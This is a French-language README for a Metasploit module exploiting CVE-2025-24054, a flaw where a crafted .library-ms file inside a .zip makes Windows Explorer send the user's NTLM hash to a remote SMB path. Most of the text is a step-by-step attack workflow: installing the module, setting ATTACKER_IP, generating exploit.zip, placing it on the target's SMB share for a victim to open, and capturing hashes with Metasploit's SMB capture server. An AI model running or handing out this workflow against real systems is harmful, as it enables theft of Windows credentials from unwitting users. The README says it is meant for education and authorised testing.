
Module Metasploit pour exploiter CVE-2025-24054 (ex 24071). Exploit de fuite NTLM intégré dans Metasploit pour les vecteurs d'attaque basés sur des bibliothèques Windows.
La vulnérabilité se produit pendant le processus d'extraction d'un fichier .zip. En interagissant avec un fichier .library-ms spécialement conçu, l'Explorateur Windows traite le schéma XML interne et lance automatiquement une demande d'authentification SMB vers un chemin distant contrôlé par l'attaquant.
Ce comportement permet l'exfiltration du hash NTLM de l'utilisateur sans nécessiter d'interaction supplémentaire au-delà de la décompression du fichier. Pour voir une preuve de concept, je vous recommande de visiter le lien suivant : Fluffy - HTB.
Bien qu'à l'origine cette vulnérabilité ait été diffusée sous le nom de CVE-2025-24071, elle est actuellement suivie officiellement sous le nom de CVE-2025-24054.
Cloner le dépôt :
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Copier le module dans le répertoire de Metasploit :
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
Si le répertoire n'existe pas, créez-le avec :
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
Ensuite, copiez à nouveau le module.
Démarrer Metasploit et charger le module :
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
Si le module se charge correctement, vous pourrez voir les options pour le configurer :
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP de l'attaquant (où s'exécute Responder/Impacket)
FILENAME exploit.zip yes Le nom du fichier ZIP
LIBRARY_NAME documents.library-ms yes Nom du fichier .library-ms
SHARE_NAME recurso yes Nom du partage fictif
Configurez le module et exécutez :
❯ set ATTACKER_IP 0.0.0.0 # Remplacez par votre IP d'attaque
❯ set FILENAME exploit.zip # Nom du payload que vous téléchargerez sur le SMB (machine cible)
❯ set LIBRARY_NAME malicious.library-ms # Nom du fichier .library-ms
❯ set SHARE_NAME it_shared # Nom du partage SMB
❯ run
Output : le module génère un fichier .zip qui doit être téléchargé sur le serveur SMB cible pour une exécution ultérieure par la victime.
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Fichier enregistré dans : /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
Enfin, utilisez le module de capture SMB de Metasploit pour recevoir les hashes NTLM :
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Remplacez par votre IP d'attaque
❯ run
Si vous avez des problèmes pour démarrer le serveur SMB depuis Metasploit :
Ce module a été développé à des fins éducatives et de tests autorisés uniquement. L'utilisation non autorisée de ce type d'outils peut être illégale.
Security Layer